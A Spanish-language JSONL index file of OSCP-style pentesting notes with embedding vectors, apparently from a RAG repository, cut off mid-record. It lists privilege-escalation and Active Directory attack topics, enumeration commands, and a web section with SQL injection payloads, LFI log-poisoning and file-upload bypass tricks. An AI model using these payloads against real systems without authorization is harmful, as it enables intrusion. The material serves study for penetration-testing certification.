0.02779, 0.00566, -0.04843, 0.0403, 0.06225, -0.15547, 0.02364, 0.02525, 0.19395, 0.11681, -0.00353, -0.0451, -0.21368, 0.08283, 0.07114, 0.02273, 0.23944, -0.05034, 0.02757, 0.03004, -0.11632, -0.03588, 0.00358, 0.05652, 0.08287, -0.06128, -0.02445, -0.08826, -0.13955, 0.05618, 0.00015, 0.03969, 0.0095, -0.02598, -0.05705, 0.00366, 0.01666, 0.04074, 0.01394, 0.06043, -0.12405, -0.08376, -0.04977, 0.00104, -0.01031, -0.02497, -0.03467, -0.17688, -0.06069, 0.05258, 0.03194, -0.06042, -0.06856, 0.06392, 0.06899, 0.00145, -0.09762, 0.03645, 0.003, -0.02279, -0.01052, 0.02449, -0.02216, 0.10322, -0.02122, 0.01548, 0.02093, -0.09771, 0.09706, 0.08651, 0.02367, -0.07086, 0.08579, 0.00082, 0.06313, 0.05412, -0.01898, -0.02537, 0.047, -0.06405, -0.01796, -0.07757, 0.01959, -0.02452, -0.01498, -0.02862, -0.08931, 0.06173, -0.04213, 0.05588, -0.01821, 0.07886, -0.13208, -0.00132, -0.02959, 0.06695, 0.02224, 0.01889, 0.03984, -0.0958, -0.05929, 0.075, -0.02639, 0.06505, 0.04517, 0.03533, 0.06917, -0.06242, -0.07194, 0.03757, 0.04479, 0.0361, -0.03196, 0.03327, 0.0308, -0.05111, -0.02377, -0.03466, -0.08942, -0.05855, 0.06719, 0.0556, 0.01901, 0.05517, -0.00194, -0.01142, 0.00284, -0.00528, 0.01376, -0.03083, -0.0167, -0.00322, 0.00247, -0.011, 0.0271, -0.07833, -0.03924, -0.03936, 0.04236, -0.02753, 0.0457, 0.01751, -0.01597, -0.01619, 0.01249, 0.02488, -0.01618, 0.03546, -0.01179, 0.06086, 0.06573, 0.00573, -0.06557, -0.03004, 0.00849, -0.0015, -0.03897, -0.13414, -0.03524, -0.00548, 0.00726, 0.04227, 0.03024, -0.12422, -0.00328, -0.00056, -0.05006, -0.0328, 0.01642, -0.03307, -0.03373, 0.02241, 0.06095, 0.06144, -0.01861, 0.01406, -0.02393, 0.00093, 0.02984, 0.02615, -0.04662, -0.00357, 0.04796, -0.02023, -0.02874, 0.0692, 0.05341, -0.05272, 0.01195, 0.00711, -0.0237, 0.03208, 0.02564, -0.06707, 0.01262, 0.03358, -0.06366, -0.00439, -0.03436, -0.01564, 0.01358, 0.00892, -0.02344, -0.02585, -0.01053, -0.01632, -0.08421, 0.05085, 0.04256, -0.03748, -0.04727, 0.004, -0.00611, -0.06309, 0.01323, -0.04067]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux · Privesc Windows · PEASS-ng\n- Potato attacks · GTFOBins y LOLBAS", "v": [-0.2817, -0.23025, -0.08903, -0.07752, 0.06131, -0.06704, 0.1129, -0.12948, -0.0285, 0.0809, 0.14002, 0.1005, -0.00775, 0.03454, 0.06183, -0.06648, -0.05906, -0.08986, -0.04714, 0.07039, -0.07354, 0.09576, -0.20087, -0.05406, 0.24111, 0.08752, 0.03529, -0.03598, -0.0444, 0.06021, -0.09809, -0.01884, -0.16566, 0.01092, 0.00973, 0.03931, 0.03088, 0.05587, 0.09201, 0.16835, 0.13529, 0.09917, -0.07177, 0.00875, 0.09086, -0.19964, 0.03766, 0.12138, 0.0175, -0.13315, -0.05218, 0.00161, -0.02547, -0.09021, 0.06325, 0.05141, 0.01744, -0.02743, -0.06486, 0.07692, -0.15792, 0.00367, 0.02312, -0.07342, 0.05485, -0.03203, 0.0309, 0.02307, -0.00366, 0.06401, -0.05447, 0.08347, 0.01674, -0.00883, 0.01586, -0.04738, -0.05307, 0.01485, 0.10619, 0.08009, -0.0413, -0.01389, 0.01603, 0.07902, -0.05095, -0.1096, 0.00188, -0.00287, -0.03928, -0.00126, 0.10061, 0.02275, -0.0986, 0.08028, 0.06409, -0.0372, -0.01273, 0.04362, 0.01762, -0.0098, -0.00386, 0.00306, -0.04236, 0.09746, 0.03251, 0.0083, 0.01396, -0.05733, -0.01266, -0.05641, 0.06827, 0.05443, 0.02383, -0.02379, 0.00428, 0.00284, -0.06428, -0.01018, 0.03586, -0.01357, -0.04317, -0.04098, 0.02128, -0.02882, 0.0248, 0.00662, -0.07768, 0.10689, -0.0775, 0.00174, 0.05895, -0.04801, 0.0675, 0.05173, -0.08901, 0.10076, 0.02683, -0.08024, 0.0077, -0.0533, 0.08586, 0.07263, 0.02033, 0.00869, 0.09056, 0.03787, 0.02094, -0.09843, 0.01045, 0.00935, 0.01607, 0.00871, -0.00992, -0.04273, -0.0248, -0.01679, -0.02612, -0.00081, -0.00874, -0.00286, 0.05698, 0.04364, -0.02886, 0.00382, -0.05404, -0.01074, 0.05145, -0.00409, 0.01212, -0.06199, -0.00309, -0.03091, -0.07651, -0.02602, 0.01753, -0.04386, 0.06336, -0.03515, -0.05724, -0.01593, -0.06032, 0.01176, 0.00177, 0.01702, -0.01978, -0.01476, -0.0071, -0.00261, 0.0051, 0.00227, -0.01705, 0.03681, 0.04524, -0.01462, 0.01636, 0.02697, -0.05722, -0.02738, -0.00133, -0.02127, -0.01264, -0.01888, -0.03873, -0.00835, 0.03269, -0.01313, 0.00579, -0.05861, 0.00265, 0.00451, 0.01559, -0.00103, 0.00287, -0.06737, 0.06035, 0.00059, 0.0106, 0.01505, 0.00278, -0.03094, -0.04018, 0.04751, 0.06983, -0.03525, -0.012, -0.02176, -0.04843, -0.00809, -0.01833, -0.03035, 0.03611, 0.01554, 0.01102, -0.0486, 0.04308, 0.0202, 0.00993, 0.03475, 0.00917, 0.00551, -0.03063, 0.065, 0.01345, -0.02775, -0.07171, -0.06287, -0.00574, 0.02381, -0.03677, -0.0273, 0.0092, -0.0558, -0.03075, -0.0687, -0.07551, 0.01372]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🏰 Active Directory\n- Active Directory (índice) · Kerberos · Kerberoasting · AS-REP Roasting\n- Mimikatz · Impacket · BloodHound\n- Pass-the-Hash · DCSync · Golden Ticket · Silver Ticket · secretsdump\n- Movimiento lateral · Pivoting ligolo-ng\n- GPP cpassword · LAPS · ACL abuses", "v": [-0.27231, -0.24343, 0.06417, -0.1797, -0.01881, -0.14998, -0.13415, 0.09521, -0.10054, 0.19555, 0.13186, -0.05626, -0.03275, -0.07338, 0.13908, -0.05224, -0.06632, -0.06, -0.0729, -0.06359, 0.02426, 0.14741, -0.13809, -0.03845, 0.16574, 0.12922, 0.02764, 0.01651, -0.01017, -0.0442, -0.08767, -0.09626, -0.0959, 0.01875, -0.08743, -0.14093, -0.07689, 0.09078, 0.08114, 0.11924, -0.01919, 0.11763, -0.08218, 0.0289, 0.03382, -0.06717, 0.07761, 0.01701, -0.02382, 0.00892, -0.07619, 0.01731, -0.12619, -0.03811, -0.033, 0.01646, -0.10336, -0.01296, -0.16767, -0.00836, 0.01696, -0.07334, -0.06573, -0.01792, -0.03713, -0.00862, 0.01178, -0.0972, -0.01173, 0.08141, -0.0677, 0.0937, 0.12038, 0.08254, 0.10898, -0.04713, 0.16047, -0.08498, -0.00864, 0.10905, -0.01668, -0.03077, -0.01265, 0.02742, 0.00254, -0.05787, 0.06291, -0.08338, -0.00821, -0.00355, 0.06318, 0.03451, -0.01226, 0.06817, -0.03416, -0.04887, -0.15411, 0.00346, 0.00868, -0.02346, 0.00117, 0.02733, -0.02379, 0.01701, 0.00759, 0.01554, 0.01356, 0.07181, -0.0036, -0.01036, 0.05145, 0.0412, 0.01447, -0.04879, 0.06608, 0.08316, 0.02897, 0.00025, 0.09528, 0.03894, 0.005, 0.03279, 0.00503, 0.00223, -0.01593, 0.00956, 0.00495, 0.00695, -0.01447, -0.02142, -0.01554, 0.03604, -0.02842, -0.00035, -0.01074, 0.0012, -0.00768, 0.04907, 0.0564, -0.04402, -0.02167, -0.03318, -0.00404, 0.09795, 0.02583, 0.00963, 0.04547, -0.00731, -0.00547, 0.04468, -0.0009, -0.00533, -0.04693, -0.00824, 0.01981, 0.004, 0.00219, -0.01344, -0.05519, 0.01293, 0.00131, 0.04424, -0.01883, 0.03373, -0.02455, 0.07473, 0.03371, -0.01616, -8e-05, -0.01053, 0.00512, -9e-05, 0.03512, -0.01257, -0.02995, -0.06645, 0.09986, -0.05675, 0.05222, -0.06776, 0.0851, -0.03588, -0.01597, 0.06682, -0.04098, -0.01024, 0.02384, -0.04586, 0.0366, -0.05324, 0.01238, -0.02301, 0.07543, -0.02481, -0.00723, -0.03123, 0.02926, -0.04562, -0.03059, -0.07933, 0.03779, 0.03924, 0.02946, 0.00353, 0.07249, -0.03099, 0.02538, 0.05185, -0.02033, 0.0023, -0.01119, -0.03389, 0.06726, -0.00165, -0.01955, -0.01985, -0.06872, -0.03115, -0.04399, -0.017, 0.0114, 0.00993, 0.039, -0.01016, -0.00024, 0.01754, -0.01131, -0.02167, 0.01005, 0.00977, 0.07043, 0.0457, -0.03865, 0.02019, 0.02477, -0.01323, -0.03877, 0.03169, -0.03808, 0.02719, 0.02747, -0.00337, 0.01455, 0.0264, -0.01529, -0.01383, -0.00105, 0.02135, 0.04312, 0.02282, -0.00031, -0.05066, -0.0512, -0.05589, -0.05058, -0.02153]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🧪 Avanzado / Post-explotación\n- Buffer Overflow · Metasploit · msfvenom\n- Tunneling · Cracking de contraseñas · Exploits conocidos\n- AV evasion · Client-side attacks", "v": [0.02342, -0.16054, -0.10932, -0.21803, -0.08017, 0.03033, -0.05534, -0.02441, -0.05348, 0.09646, -0.0187, -0.14244, -0.08818, 0.1553, 0.09039, 0.01957, 0.05422, -0.11239, 0.02396, 0.06909, -0.0394, 0.01058, -0.03106, 0.0435, 0.00915, 0.11988, -0.16992, 0.02354, -0.0435, -0.1335, 0.04792, 0.01954, 0.05003, 0.08257, 0.07594, -0.06745, -0.01098, -0.02013, 0.04429, 0.17934, 0.01394, -0.04984, -0.11881, -0.01244, 0.13841, -0.14499, -0.08917, -0.01434, -0.05795, 0.06598, -0.07739, -0.06259, -0.13724, -0.00028, -0.02397, -0.10372, 0.0378, -0.01785, -0.06211, 0.13177, 0.0398, 0.02264, -0.00401, 0.01597, -0.04187, -0.1149, 0.06952, -0.01709, -0.07883, 0.13432, -0.04677, 0.05006, 0.01744, 0.02434, 0.0909, -0.09471, 0.05861, -0.01621, 0.07678, 0.08421, -0.0871, 0.03981, -0.08362, -0.07659, -0.09743, 0.00186, -0.00725, -0.06309, -0.03214, 0.05853, 0.01823, 0.01307, -0.0175, -0.02495, 0.00522, -0.02469, 0.01278, 0.04723, -0.00238, -0.03345, -0.02322, 0.10285, -0.04022, 0.08302, 0.03897, 0.03181, 0.0115, -0.08428, 0.00763, -0.04477, 0.06546, -0.01692, 0.06534, -0.09902, -0.0015, 0.00444, -0.02606, -0.03903, 0.07066, 0.08309, -0.04645, -0.08385, 0.00175, 0.03447, -0.04496, -0.0628, -0.01544, 0.04143, -0.05753, -0.04905, 0.03102, -0.00345, -0.10418, 0.11218, 0.05538, 0.01345, 0.1112, -0.01768, -0.00555, -0.03728, 0.01033, -0.02069, -0.03515, 0.07639, 0.04583, 0.0257, 0.05274, -0.10353, 0.03966, -0.00481, 0.01562, -0.02446, 0.00725, -0.07127, 0.02997, -0.08382, -0.05026, 0.00746, -0.04819, 0.15433, 0.05667, -0.00639, -0.05279, 0.06466, -0.05761, -0.03434, 0.03512, -0.06699, -0.02281, -0.03839, 0.03449, 0.01048, 0.07381, -0.0287, -0.02506, -0.07806, -0.01876, -0.12738, 0.01349, -0.02669, -0.08457, -0.06505, 0.02563, 0.07537, 0.02688, -0.09661, 0.12082, -0.00856, 0.00153, -0.00157, 0.02149, -0.03244, -0.03333, 0.06193, -0.03805, -0.02096, -0.01708, -0.03492, 0.03519, -0.05298, 0.06499, 0.0195, 0.00724, -0.10923, 0.01296, 0.05934, -0.04762, -0.02587, -0.09312, 0.00486, 0.07472, -0.06256, 0.05169, -0.08169, -0.04292, -0.03581, 0.01192, -0.00236, 0.00276, -0.06048, -0.02048, 0.07625, 0.03375, 0.01452, -0.04886, 0.0105, -0.01723, -0.02993, -0.00439, 0.01516, -0.0045, 0.04725, -0.0913, -0.04134, 0.05721, -0.01876, -0.02147, -0.02551, -0.06878, 0.02006, -0.00437, 0.01919, 0.02468, -0.02916, -0.06963, -0.03017, 0.01485, -0.00717, 0.00063, -0.01292, -0.05265, -0.02426, -0.02593, -0.0366, 0.05145, 0.00165]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash · Operadores PowerShell\n- Port scanner PowerShell · Bucles bash sobre IPs", "v": [-0.12835, -0.29914, 0.02339, -0.08497, -0.14583, -0.12785, 0.03525, -0.19044, 0.05076, 0.07038, -0.12642, 0.15015, -0.00211, -0.11179, -0.02981, 0.00784, -0.08002, -0.00927, -0.02536, -0.05194, -0.05189, 0.1431, -0.1462, 0.05055, -0.00434, 0.17367, -0.13109, 0.14386, -0.11121, -0.04564, -0.1491, -0.10223, 0.06118, -0.00611, -0.0417, 0.04463, -0.17439, -0.0218, 0.14549, 0.17218, -0.11834, 0.10289, -0.07992, 0.11796, 0.22055, -0.04683, 0.07591, -0.0151, 0.02357, -0.10801, -0.08014, -0.07342, -0.1088, 0.11457, 0.04722, -0.10679, 0.05923, -0.02931, -0.05984, -0.04858, -0.03097, 0.00109, -0.08245, -0.06518, -0.01176, 0.03175, -0.10666, -0.0588, 2e-05, 0.01011, -0.10039, 0.06165, -0.00012, 0.11226, -0.0012, 0.02286, 0.05136, -0.02596, 0.00207, 0.01809, -0.09518, 0.01675, -0.03262, 0.01375, 0.00025, -0.03058, -0.03882, -0.10873, -0.07234, 0.02966, 0.0947, 0.01452, 0.01506, 0.09474, 0.06035, 0.00053, 0.00526, 0.00381, -0.00256, -0.05274, -0.01555, -0.04036, -0.10495, 0.03952, 0.07134, 0.0099, -0.00509, 0.01928, 0.0212, 0.0624, 0.01151, -0.02537, 0.07107, 0.01161, -0.04457, 0.01638, -0.02196, -0.11477, -0.00805, 0.02023, 0.0372, -0.0163, 0.0261, 0.008, 0.04, 0.00491, 0.03328, 0.09747, 0.06064, -0.03214, 0.07868, 0.03019, -0.00505, 0.01716, -0.00466, 0.04229, -0.02622, -0.05753, 0.00657, -0.05553, -0.00309, 0.03198, -0.02439, 0.02327, 0.05104, -0.05916, 0.00518, 0.00224, -0.00042, -0.00329, 0.06629, 0.05367, -0.00138, 0.0762, -0.0271, 0.00807, 0.05339, -0.03094, -0.06709, -0.05454, 0.0097, 0.00943, -0.0018, 0.03992, -0.0427, -0.00311, -0.08915, -0.03807, 0.01221, -9e-05, -0.00623, 0.05486, 0.00762, 0.02992, -0.00918, -0.0195, 0.02567, -0.02171, -0.00739, -0.02878, -0.0156, 0.00727, 0.02044, -0.01646, 0.03592, 0.0143, 0.06579, -0.0321, -0.01259, 0.01997, 0.03144, 0.00374, 0.02145, -0.04343, 0.00825, 0.02071, -0.01441, -0.07706, 0.00846, -0.02149, -0.0234, 0.00733, -0.0207, -0.01041, 0.05067, 0.02595, -0.0236, -0.05603, 0.00733, -0.06976, 0.016, 0.00918, 0.04933, 0.02401, 0.00301, -0.00401, -0.00264, -0.00021, 0.00977, 0.01905, -0.07961, -0.00581, -0.01221, 0.0247, 0.01844, 0.00214, -0.00216, -0.02458, 0.01871, 0.04018, 0.02985, 0.03313, -0.03733, -0.00549, -0.02918, -0.04221, -0.04064, 0.03581, -0.0229, -0.01509, -0.0345, 0.01476, 0.0305, -0.01195, -0.05735, -0.00647, -0.01347, 0.00702, 0.00754, 0.00601, 0.0082, 0.00956, 0.03459, -0.04625, 0.01917, -0.00511]} +{"tipo": "metodologia", "herramienta": "README", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/README.md", "texto": "# Conocimiento\n\nMetodología de pentesting y Linux que **viene con el repo**, para que un clon\nrecién hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase —enumeración, explotación\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzado—\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; están limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\nEs la parte del RAG que SÍ se publica: el conocimiento genérico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben —ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)—; este pack los complementa, y en\nla máquina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAñadir o corregir metodología aquí es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "v": [0.21288, -0.02177, -0.16919, -0.048, 0.10992, -0.16559, 0.00581, -0.12677, -0.13199, -0.04564, 0.03162, -0.08652, -0.04533, -0.10141, 0.06872, -0.0174, 0.06889, -0.04733, 0.01419, 0.0032, -0.07795, -0.04913, -0.13174, 0.02365, -0.01246, 0.10107, 0.16321, -0.03555, -0.05245, 0.0312, -0.03563, 0.08645, -0.0573, -0.1143, -0.11613, -0.03354, -0.03009, 0.02213, -0.00341, 0.15439, -0.11488, -0.03115, -0.1519, 0.04737, 0.03187, -0.05822, 0.00222, 0.04493, -0.05673, -0.01802, -0.04451, -0.11756, -0.14148, -0.02745, -0.07694, -0.02838, 0.16185, 0.07658, 0.04118, -0.02612, -0.05009, 0.11239, -0.00725, -0.0466, 0.1216, -0.02037, -0.02156, -0.08544, -0.10249, 0.02227, -0.04653, 0.00335, 0.0163, -0.04046, 0.10457, -0.06719, 0.01457, 0.02146, 0.05958, 0.07091, -0.10829, -0.10103, -0.08462, 0.02049, -0.07396, -0.06254, 0.10037, -0.04665, -0.06334, -0.03312, 0.12705, 0.05036, -0.03354, -0.00134, 0.01786, -0.05446, 0.06016, 0.02625, 0.0566, 0.04096, 0.01133, 0.03116, -0.05925, 0.13459, 0.05292, 0.09521, 0.06904, -0.01806, 0.04564, -0.01697, 0.08257, 0.00592, 0.0022, -0.05111, -0.03495, 0.03242, -0.05229, -0.04743, -0.04314, -0.08893, -0.06512, -0.13938, 0.01697, -0.0424, -0.00372, -0.06377, -0.05172, 0.06877, 0.08997, 0.03132, -0.04752, 0.02039, -0.03011, 0.02711, 0.01604, 0.05795, -0.00137, -0.0192, 0.05384, -0.07538, 0.06993, 0.06661, -0.06176, 0.01868, 0.06625, 0.00037, 0.03245, -0.10901, -0.09488, 0.01756, 0.03034, 0.01074, 0.02651, 0.0929, -0.00585, -0.03174, -0.00747, -0.06923, 0.02238, 0.06061, 0.01136, 0.02456, 0.00137, -0.00756, -0.00519, -0.02684, 5e-05, -0.03729, 0.04012, 0.02343, -0.04812, -0.00035, -0.03986, -0.08804, 0.04428, -0.08983, -0.0164, -0.02744, 0.06139, 0.00568, 0.0076, -0.05438, -0.03654, -0.02556, -0.06371, -0.0151, -0.0144, 0.01428, 0.00597, -0.0004, 0.06301, 0.00227, -0.04223, 0.02201, 0.01821, -0.03459, 0.0219, -0.00667, 0.01802, -0.01451, -0.08065, -0.00861, -0.00363, -0.02261, -0.01287, 0.00344, -0.03108, 0.02082, -0.01487, 0.04196, 0.05123, -0.07807, 0.03226, -0.08188, -0.07765, -0.01845, 0.01119, 0.03483, -0.02716, 0.0159, 0.02826, 0.11655, 0.06492, -0.02695, 0.01861, 0.031, 0.04887, -0.01728, 0.05015, 0.02867, -0.04159, 0.04945, -0.02864, -0.06009, 0.03452, 0.03594, 0.01086, 0.00926, -0.08531, -0.10457, -0.02443, 0.05801, -0.01192, -0.10244, -0.06375, -0.03284, -0.08704, 0.02902, 0.03164, -0.08836, 0.00087, -0.02699, 0.01334, -0.10311, 0.03126, -0.04478]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "# Trucos y Trampas — OSCP / Pentest\n\n> Compilado de cultura pública (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en máquinas estilo OSCP.\n\n---", "v": [-0.01347, -0.24197, -0.05976, -0.04352, 0.05376, -0.16006, 0.02439, 0.01585, -0.00864, 0.23902, -0.08414, -0.07649, 0.11075, 0.00391, 0.00914, -0.03954, -0.00337, -0.1161, 0.11042, 0.07369, -0.10039, -0.00692, -0.18789, 0.02555, 0.12454, -0.00658, 0.0133, 0.05604, -0.22749, -0.03648, 0.01868, -0.12275, -0.04021, -0.01979, -0.16069, -0.09944, -0.00511, -0.03531, -0.00122, 0.16524, 0.0141, 0.15603, -0.06754, 0.15573, 0.0804, -0.0577, 0.06017, 0.02429, -0.00166, -0.02197, -0.07502, -0.09566, -0.17979, -0.01023, -0.02746, -0.04884, -0.01075, 0.10614, -0.08498, 0.02178, -0.01013, 0.05863, -0.04744, -0.13848, 0.07462, -0.07699, -0.03513, -0.07055, -0.01364, 0.03323, 0.01502, 0.00913, -0.06065, -0.09204, 0.08085, -0.10159, 0.09476, -0.05993, 0.0816, -0.01501, -0.07033, -0.11106, 0.00742, -0.00436, -0.08484, -0.05115, 0.06151, 0.0134, -0.07971, -0.03032, 0.15409, 0.07414, 0.04831, 0.02807, -0.02491, -0.14142, 0.06581, 0.10285, 0.05293, 0.00975, 0.00587, 0.11011, -0.03343, -0.00411, -0.05119, 0.04759, 0.09551, -0.03629, 0.10491, 0.05033, 0.06786, 0.02277, -0.03027, 0.04115, -0.02623, -0.07777, -0.04505, -0.01266, 0.0099, -0.03149, -0.00083, 0.02232, -0.00565, -0.04018, 0.04568, 0.00654, -0.0236, -0.00239, 0.05356, 0.03239, -0.00465, -0.0554, -0.05374, 0.01931, -0.00627, 0.04239, -0.04082, -0.02439, 0.00986, -0.01192, 0.10045, 0.04242, -0.01235, 0.04618, 0.01739, -0.02272, 0.02295, -0.06376, -0.00111, 0.08789, 0.01903, 0.02846, 0.04162, 0.02633, 0.02155, -0.04709, 0.03156, -0.04209, -0.02706, 0.04035, -0.06739, 0.02272, 0.02436, 0.05349, -0.03369, 0.02072, -0.00912, -0.04587, 0.02394, -0.0482, -0.01711, -0.04347, -0.01626, -0.0453, -0.04768, -0.07034, 0.04964, -0.04769, -0.00695, -0.01953, 0.01606, 0.02497, -0.03289, 0.00317, -0.01587, -0.08402, 0.06231, -0.02751, 0.01238, 0.01353, 0.00522, -0.00814, 0.02649, -0.00712, -0.00261, -0.0065, -0.00315, -0.03105, -0.0047, 0.03415, -0.09391, 0.03501, -0.02382, -0.05743, -0.00862, -0.00496, 0.01556, 0.0068, -0.04498, 0.01728, 0.0646, -0.01515, 0.01027, -0.04171, -0.05188, 0.04068, 0.01196, 0.05347, -0.00826, 0.01809, -0.01076, 0.06305, 0.05799, 0.00129, -0.00043, -0.02625, 0.01434, -0.00961, 0.03679, -0.02381, -0.00655, 0.05137, 0.01174, -0.06504, 0.00365, 0.03721, 0.01076, -0.02336, -0.06506, -0.03407, 0.02162, 0.00891, -0.01851, -0.07045, -0.01542, -0.05301, -0.03508, 0.00352, -0.01978, -0.04487, 0.01052, -0.02778, -0.01683, -0.1239, 0.01285, 0.01359]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Trampas de enumeración (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n Añade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeñas ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "v": [-0.10722, -0.09997, 0.02499, -0.02941, 0.12256, -0.19819, -0.04332, -0.12494, -0.0043, 0.10496, -0.1309, -0.13708, 0.05205, -0.10046, -0.04877, -0.03668, 0.02692, -0.08475, -0.00691, -0.02076, -0.00945, 0.10661, -0.11328, -0.06428, 0.06, 0.00832, -0.12273, 0.06883, -0.14039, -0.00984, 0.0318, -0.03859, -0.21089, 0.09311, -0.09652, -0.04272, -0.0452, 0.00541, -0.03273, 0.15024, -0.01347, 0.09965, -0.10818, 0.09957, -0.03272, -0.03372, -0.06876, 0.00345, -0.02085, -0.12768, -0.1128, -0.0309, -0.04549, -0.0207, -0.06507, 0.0645, 0.09234, -0.05086, -0.01309, -0.08298, 0.0266, 0.04709, -0.00589, -0.10106, 0.04086, -0.14178, -0.00906, -0.01123, -0.09764, -0.04972, -0.06672, -0.00084, 0.02847, -0.0896, 0.08085, -0.04433, 0.05849, -0.12912, 0.06584, 0.04502, 0.04632, -0.06403, -0.10103, 0.0509, -0.0721, -0.18744, 0.05832, -0.11838, -0.017, -0.04271, 0.01375, 0.07985, -0.0096, 0.06932, -0.01167, -0.16725, 0.11945, 0.00363, 0.02967, -0.10543, 0.05036, 0.10021, -0.05532, -0.02513, 0.08006, 0.05551, 0.03861, 0.02732, 0.04182, 0.04737, 0.08088, -0.02544, 0.01386, -0.10719, -0.04142, 0.00271, -0.06775, -0.00329, 0.10467, -0.04853, -0.07687, -0.09016, -0.02787, 0.07497, -0.00371, 0.0055, 0.01589, 0.07463, 0.01923, -0.05993, 0.07375, 0.00478, -0.03755, -0.05474, -0.01793, 0.07306, 0.03823, -0.00502, 0.01777, 0.09474, -0.03993, -0.05552, -0.04292, 0.03495, 0.09447, 0.02912, 0.06883, -0.06893, -0.07289, 0.04088, -0.00114, 0.11908, -0.03018, -0.0345, 0.00571, -0.02212, 0.03561, -0.11638, -0.04353, 0.07612, 0.00284, 0.04611, 0.02997, 0.03657, 0.00469, 0.07083, -0.02719, 0.04408, 0.03783, -0.03713, -0.01292, 0.03393, -0.04066, -0.04634, -0.03875, -0.02256, 0.01196, -0.02778, 0.02079, -0.00386, 0.01342, -0.01998, 0.04055, 0.0631, -0.0431, -0.01792, -0.00847, -0.02226, 0.00971, -0.02175, 0.01934, 0.03711, -0.11364, 0.05042, 0.02831, 0.0015, 0.00714, -0.01294, 0.00781, 0.01515, -0.01128, 0.01917, 0.01067, -0.07509, -0.0057, -0.06522, -0.03849, 0.05041, -0.03011, 0.02072, 0.03294, -0.04793, 0.05495, -0.05169, -0.04719, 0.02181, 0.02375, 0.02124, 0.00876, 0.00146, -0.0056, 0.00969, 0.04935, -0.01583, 0.053, 0.00623, 0.03837, -0.01874, 0.06528, -0.03383, 0.01465, 0.03286, -0.0001, -0.07806, 0.04641, 0.0072, -0.05079, -0.01869, -0.02611, -0.01779, -0.00358, 0.04166, -0.01184, -0.05309, -0.03442, -0.0346, -0.10133, 0.02678, 0.01351, 0.02228, -0.01226, 0.01189, -0.01451, -0.06443, 0.00479, -0.0214]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira también: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI → RCE ──────────────────────────────────────────────\n Si tienes LFI básico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensión: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp → cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "v": [-0.06375, -0.05304, 0.03837, -0.07688, 0.05033, -0.24217, -0.02694, -0.12248, 0.04146, 0.04081, -0.17168, -0.06324, -0.01082, -0.07598, -0.02054, -0.06147, 0.00722, -0.10875, -0.09616, -0.02349, -0.00136, 0.04592, -0.13004, -0.13286, -0.02057, 0.04981, -0.08556, 0.03429, -0.18636, 0.00212, 0.01357, 0.02939, -0.17187, 0.08942, -0.17268, 0.02705, -0.04338, 0.03278, -0.0439, 0.16858, -0.07998, 0.07619, -0.18041, 